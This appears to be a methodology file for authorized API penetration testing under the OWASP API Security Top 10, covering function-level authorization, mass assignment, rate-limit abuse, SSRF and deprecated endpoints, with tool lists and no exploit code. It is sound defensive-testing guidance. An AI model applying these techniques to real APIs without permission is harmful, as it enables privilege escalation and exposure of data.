Pentest API Deep
Purpose
Perform dedicated API-specific vulnerability testing beyond basic BOLA/GraphQL coverage. Addresses Broken Function Level Authorization (BFLA), mass assignment, rate limiting, excessive data exposure, and unsafe consumption per OWASP API Security Top 10 (2023).
Prerequisites
Authorization Requirements
- Written authorization with API testing scope explicitly included
- API documentation (OpenAPI/Swagger specs, GraphQL schema) if available
- Test accounts at multiple privilege levels (user, admin, service account)
- Rate limit awareness — confirm acceptable request volume with target owner
Environment Setup
- Postman or Insomnia for manual API exploration
- Burp Suite with API-specific extensions
- GraphQL Voyager for schema visualization
- grpcurl for gRPC service testing
Core Workflow
- API Discovery: Enumerate endpoints via OpenAPI/Swagger specs, GraphQL introspection, gRPC reflection, traffic analysis. Discover undocumented endpoints with Kiterunner.
- BFLA Testing: Access admin-only API functions as regular user. HTTP method switching (GET→DELETE). Test function-level authorization gaps distinct from object-level (BOLA).
- Mass Assignment: Send extra fields in POST/PUT (role, isAdmin, balance). Check response objects for leaked internal fields (WSTG-INPV-20).
- Rate Limiting & Resource: Test missing rate limits, GraphQL depth/complexity abuse, pagination abuse, regex DoS via API input.
- Excessive Data Exposure: Compare API responses across privilege levels. Identify fields returned but not displayed in UI. Test verbose error responses.
- Unsafe Consumption: SSRF through upstream API calls, injection through trusted-but-tainted API response data.
- API Versioning: Old API versions with weaker controls, version header manipulation, deprecated endpoint access.
OWASP API Security Top 10 (2023) Coverage
| Category | Test Focus | Status |
|---|
| API1 Broken Object Level Authorization | IDOR via API params | ✅ |
| API2 Broken Authentication | Token/key weaknesses | ✅ |
| API3 Broken Object Property Level Authorization | Mass assignment, excessive data | ✅ |
| API4 Unrestricted Resource Consumption | Rate limits, complexity | ✅ |
| API5 Broken Function Level Authorization | BFLA, method switching | ✅ |
| API6 Unrestricted Access to Sensitive Business Flows | Automation abuse | ✅ |
| API7 Server Side Request Forgery | API-triggered SSRF | ✅ |
| API8 Security Misconfiguration | CORS, headers, versioning | ✅ |
| API9 Improper Inventory Management | Shadow APIs, deprecated versions | ✅ |
| API10 Unsafe Consumption of Third-Party APIs | Upstream injection | ✅ |
Tool Categories
| Category | Tools | Purpose |
|---|
| API Discovery | Kiterunner, Swagger UI, GraphQL Voyager | Endpoint enumeration |
| Parameter Discovery | Arjun, x8, ParamSpider | Hidden parameter detection |
| Fuzzing | ffuf, Burp Intruder, custom scripts | Mass assignment, BFLA |
| GraphQL | graphql-cop, InQL, BatchQL | GraphQL-specific attacks |
| gRPC | grpcurl, grpc-tools | gRPC reflection and testing |
| Rate Testing | custom aiohttp scripts, Turbo Intruder | Rate limit verification |
References
references/tools.md - Tool function signatures and parametersreferences/workflows.md - Attack pattern definitions and test vectors